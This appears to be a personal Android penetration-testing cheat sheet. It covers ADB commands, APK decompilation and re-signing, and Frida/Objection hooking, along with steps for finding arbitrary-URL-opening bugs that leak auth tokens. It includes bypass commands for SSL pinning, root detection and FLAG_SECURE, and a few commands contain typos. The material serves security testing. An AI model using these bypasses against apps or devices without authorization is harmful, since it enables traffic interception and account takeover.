Android Pentesting

Android Pentesting Sources from Hacking articles

Blog Posts

https://rajatrao-13.github.io/learning/2020/06/10/Mobile-Security/#/

Oneliner to extract url from apk

apktool -d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"

Looking for an easy way to open arbitrary URLs in Android apps?

Download jadx decompiler and install adb
Open AndroidManifest.xml
Find all browser activities (must contain )
Run adb shell am start -n app_package_name/component_name -a android.intent.action.VIEW -d http://google.com for each of the activities (or any of your domains). Also track in Burp any requests to http://google.com or your domain.
If a domain is opened, it means you found a vulnerability! Now inspect the request if it contains any auth tokens (if yes, it means you've got an account takeover!). No? Try different techniques to obtain any PII. In the worst case you will get a reward like for an XSS.
If you can just open arbitrary links in an app. And use http://google.com (remove the space) in the 4 step.

SSL Pinning via Frida

https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-e9e1d733d29

TikTok Click RCE

https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105

Android Reverse Engineering

https://braincoke.fr/blog/2021/03/android-reverse-engineering-for-beginners-dexcalibur/#about-dexcalibur

Android Pentesting Notes

References

ADB - Android Debug Bridge

List ADB Devices and connect to it

# list devices
adb devices -l
# connect virtual devices
adb connect 192.168.52.104

What is ADB?

Android Debug Bridge is a utility that provides debugging features for android devices. ADB can be used to conduct debugging over USB as well as over TCP.

ADB Command Cheatsheet

Basics

adb connect 192.168.52.104
adb shell

Installing APK in device

adb install <apk_file.apk>

View Installed Applications

# connect shell
adb shell
#direct to data folder
cd data/data/
#list instlled apps
ls | tail -10

Starting and Stopping adb services

# start adb server
abd start-sever
# stop adb server
adb kill-server
# run adb as root
adb root
# revert back to unroot
adb unroot

Monitor Device logs

# monitor logs
adb logcat

Pulling and Pushing file from and to Device

# push files to device
adb push <source_file_name> <destination_folder>
# pull files from device
adb pull <source_file_name> <destination_folder>

Package Management Tool

# list installed apps
adb shell pm list packages | tail -10
# list system apps
adb shell pm list packages -s
# list third party apps
adb shell pm list packages -3
# clear application data
adb shell pm clear <package_name>
# view installation path of package
adb shell pm path <package_name>

Dumpsys Tool

# View running services in a package
adb shell dumpsys activity services <package_name>

# Extracting information about a package
adb shell dumpsys package <package_name>

# View foreground activity
adb shell dumpsys activity activities | grep mResumedActivity

# Information about activities in a specific package
adb shell dumpsys activity activities | grep <package_name>

# Viewing running services of a package
adb shell dumpsys activity services <package_name>

# Viewing detailed information about a package
adb shell dumpsys package <package_name>

AM Tool

# start activity
adb shell am start -n <package_name>/<activity>

# start service
adb shell am startservice -n <package_name>/<activity>

# stop service
adb shell am stopservice -n <package_name>/<activity>

View Process id of package

adb shell pidof <package_name>
# For example, I have to inspect the logs of this package, I can filter it out using grep and the PID like:
adb logcat | grep 7399

Keyevents in Android

Bypass Root Detection

Use Frida to hook any script to bypass
Use Objection to bypass by hooking up the package

Apk Reverse Engineering

Decompilation

There are many ways to decompile the app

One

Using apktool to decompile

# decompile
apktool d -f -r <apk_file>
# compile
apktool b <app_files_folder> -o <output_apk_file_name>

Two

Use Bytecode viewer, jadex-ui

Signing APK and Rebuilding

keytool -genkey -v -keystore harshit_key.keystore -alias harsh_key -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore harshit_key.keystore new_uncrackable.apk harsh_key

Understanding default files

<permissions> – Permissions that APK requires to run
<activity> – Various activities in the APK
<intent-filter> – Intent filters
<data android:scheme=”string” /> – Data Schemes
<action android:name=”string” /> – Action that an intent performs
<uses-configuration> tag – specifies input mechanisms
<uses-sdk> tag – specifies android API to be used

Android Hooking and SSLPinning using Objection Framework

Make sure to run frida

adb connect 192.168.27.101:5555
chmod 777 frida-server-14.1.3-android-x86_64 && adb push frida-server-14.1.3-android-x86_64 /tmp/frida-server

Install objection

pip3 install objection
objection –-gadget <package_name> explore

Set proxies in device and install the CA certificates
Run below command to bypass SSL Pinning

android sslpinning disable

Android Hooking

# list class methods
android hooking list class_methods <activity>

# list class
android hooking search classes main

if we want to monitor a particular activity to see what all functions the activity calls and in what logical sequence to better understand how to create hooks, we’d type the following command:

android hooking watch class <activity> --dump-args ----dump-backtrace –dump-return

FLAG_SECURE Bypass

android ui FLAG_SECURE
android ui FLAG_SECURE true
android ui FLAG_SECURE false

Launching Activity Using Objection

android intent launch_activity
android intent launch_activity <activity>

Root Detection Bypass

android root disable

thevillagehacker/Android-pentest.md